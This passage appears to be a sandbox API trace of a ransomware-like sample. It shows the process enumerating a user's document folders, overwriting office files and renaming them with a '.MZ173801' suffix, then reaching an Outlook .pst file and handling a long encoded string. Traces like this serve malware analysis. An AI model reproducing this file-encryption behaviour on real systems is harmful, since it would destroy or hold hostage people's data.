"c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\rlrwcvmue.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0122.514] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x16c78, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f158*=0x16c78, lpOverlapped=0x0) returned 1 [0122.516] CloseHandle (hObject=0x40c) returned 1 [0122.516] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\RLrwCvmuE.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\rlrwcvmue.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\RLrwCvmuE.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\wjae\\pln2\\rlrwcvmue.xlsx.mz173801")) returned 1 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] GetCurrentThreadId () returned 0x1358 [0122.517] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe74cc30, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0x347fc00, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x347fc00, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x17c92, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="VkCsrAUrC.ots", cAlternateFileName="VKCSRA~1.OTS")) returned 1 [0122.517] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.517] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.517] FindNextFileW (in: hFindFile=0xa1bb28, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe74cc30, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0x347fc00, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x347fc00, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x17c92, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="VkCsrAUrC.ots", cAlternateFileName="VKCSRA~1.OTS")) returned 0 [0122.517] GetLastError () returned 0x12 [0122.517] FindClose (in: hFindFile=0xa1bb28 | out: hFindFile=0xa1bb28) returned 1 [0122.517] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\WjAE\\PlN2\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0xaa4c7206, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa4c7206, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bb98 [0122.517] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1fc | out: lpLocalFileTime=0x19f1fc) returned 1 [0122.517] FileTimeToDosDateTime (in: lpFileTime=0x19f1fc, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.517] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77152400, ftCreationTime.dwHighDateTime=0x1d5ea38, ftLastAccessTime.dwLowDateTime=0xaa4c7206, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xaa4c7206, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="..", cAlternateFileName="")) returned 1 [0122.517] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.517] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.517] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a646200, ftCreationTime.dwHighDateTime=0x1d5ee97, ftLastAccessTime.dwLowDateTime=0xe57d9bd0, ftLastAccessTime.dwHighDateTime=0x1d5e6ae, ftLastWriteTime.dwLowDateTime=0xe57d9bd0, ftLastWriteTime.dwHighDateTime=0x1d5e6ae, nFileSizeHigh=0x0, nFileSizeLow=0x12e9, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="aZ5k5HRyxWcmwTH.odt", cAlternateFileName="AZ5K5H~1.ODT")) returned 1 [0122.517] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.517] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.517] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d327330, ftCreationTime.dwHighDateTime=0x1d5e801, ftLastAccessTime.dwLowDateTime=0x9bc12880, ftLastAccessTime.dwHighDateTime=0x1d5e768, ftLastWriteTime.dwLowDateTime=0x9bc12880, ftLastWriteTime.dwHighDateTime=0x1d5e768, nFileSizeHigh=0x0, nFileSizeLow=0x17ca0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="Kf_sHWxJdyzMv.ods", cAlternateFileName="KF_SHW~1.ODS")) returned 1 [0122.517] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc651760, ftCreationTime.dwHighDateTime=0x1d5e809, ftLastAccessTime.dwLowDateTime=0xd70a6520, ftLastAccessTime.dwHighDateTime=0x1d5ed10, ftLastWriteTime.dwLowDateTime=0xaa4a1001, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x119aa, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="PF1Hk1o6iJ_U1EnULHZ.csv.MZ173801", cAlternateFileName="PF1HK1~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ca2e820, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0xa0dd240, ftLastAccessTime.dwHighDateTime=0x1d5e2df, ftLastWriteTime.dwLowDateTime=0xaa4c7206, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x16c78, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="RLrwCvmuE.xlsx.MZ173801", cAlternateFileName="RLRWCV~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe74cc30, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0x347fc00, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x347fc00, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x17c92, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="VkCsrAUrC.ots", cAlternateFileName="VKCSRA~1.OTS")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bb98, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe74cc30, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0x347fc00, ftLastAccessTime.dwHighDateTime=0x1d5e0fb, ftLastWriteTime.dwLowDateTime=0x347fc00, ftLastWriteTime.dwHighDateTime=0x1d5e0fb, nFileSizeHigh=0x0, nFileSizeLow=0x17c92, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="VkCsrAUrC.ots", cAlternateFileName="VKCSRA~1.OTS")) returned 0 [0122.518] GetLastError () returned 0x12 [0122.518] FindClose (in: hFindFile=0xa1bb98 | out: hFindFile=0xa1bb98) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf010a60, ftCreationTime.dwHighDateTime=0x1d5e9b0, ftLastAccessTime.dwLowDateTime=0xeff5be90, ftLastAccessTime.dwHighDateTime=0x1d5ef8b, ftLastWriteTime.dwLowDateTime=0xaa47ad93, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xcb2b, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="tXqq.ppt.MZ173801", cAlternateFileName="TXQQPP~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1e6e60, ftCreationTime.dwHighDateTime=0x1d5ea7c, ftLastAccessTime.dwLowDateTime=0xf1a07be0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0xaa4a1001, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52ad, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Vh7qZ.pdf.MZ173801", cAlternateFileName="VH7QZP~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1e6e60, ftCreationTime.dwHighDateTime=0x1d5ea7c, ftLastAccessTime.dwLowDateTime=0xf1a07be0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0xaa4a1001, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52ad, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="Vh7qZ.pdf.MZ173801", cAlternateFileName="VH7QZP~1.MZ1")) returned 0 [0122.518] GetLastError () returned 0x12 [0122.518] FindClose (in: hFindFile=0xa1bcb0 | out: hFindFile=0xa1bcb0) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84fb9430, ftCreationTime.dwHighDateTime=0x1d5ef80, ftLastAccessTime.dwLowDateTime=0xc8a0c070, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0xc8a0c070, ftLastWriteTime.dwHighDateTime=0x1d5e210, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WjAE", cAlternateFileName="")) returned 0 [0122.518] GetLastError () returned 0x12 [0122.518] FindClose (in: hFindFile=0xa1bc40 | out: hFindFile=0xa1bc40) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc089d0, ftCreationTime.dwHighDateTime=0x1d5b3ce, ftLastAccessTime.dwLowDateTime=0x45b4eca0, ftLastAccessTime.dwHighDateTime=0x1d571b2, ftLastWriteTime.dwLowDateTime=0xa9b8a06a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xc4ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fnu1ZEKDFkx.docx.MZ173801", cAlternateFileName="FNU1ZE~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.518] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.518] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2bbe220, ftCreationTime.dwHighDateTime=0x1d5e9a6, ftLastAccessTime.dwLowDateTime=0x6fe7cd20, ftLastAccessTime.dwHighDateTime=0x1d5e495, ftLastWriteTime.dwLowDateTime=0xa9b8a06a, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x1a9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IQVV x.doc.MZ173801", cAlternateFileName="IQVVXD~1.MZ1")) returned 1 [0122.518] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3117c0, ftCreationTime.dwHighDateTime=0x1d5b153, ftLastAccessTime.dwLowDateTime=0x6fc85150, ftLastAccessTime.dwHighDateTime=0x1d5d349, ftLastWriteTime.dwLowDateTime=0xa9bb03eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x86d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I_TP.docx.MZ173801", cAlternateFileName="I_TPDO~1.MZ1")) returned 1 [0122.519] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa5c9c0, ftCreationTime.dwHighDateTime=0x1d59e11, ftLastAccessTime.dwLowDateTime=0x6d4edac0, ftLastAccessTime.dwHighDateTime=0x1d5e43d, ftLastWriteTime.dwLowDateTime=0xa9bb03eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x66f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkAe9XaDuAt8yrlc.docx.MZ173801", cAlternateFileName="JKAE9X~1.MZ1")) returned 1 [0122.519] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x489762b0, ftCreationTime.dwHighDateTime=0x1d56dfa, ftLastAccessTime.dwLowDateTime=0xe254fb10, ftLastAccessTime.dwHighDateTime=0x1d5b61b, ftLastWriteTime.dwLowDateTime=0xa9cbb2c5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x12bdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mXllPiyuRFE.pptx.MZ173801", cAlternateFileName="MXLLPI~1.MZ1")) returned 1 [0122.519] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0122.519] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd58 [0122.519] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0122.519] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="kkcie@kdj.kd.pst", cAlternateFileName="KKCIE@~1.PST")) returned 1 [0122.519] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0122.519] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst" (normalized: "c:\\users\\fd1hvy\\documents\\outlook files\\kkcie@kdj.kd.pst"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x67d00605, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0122.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 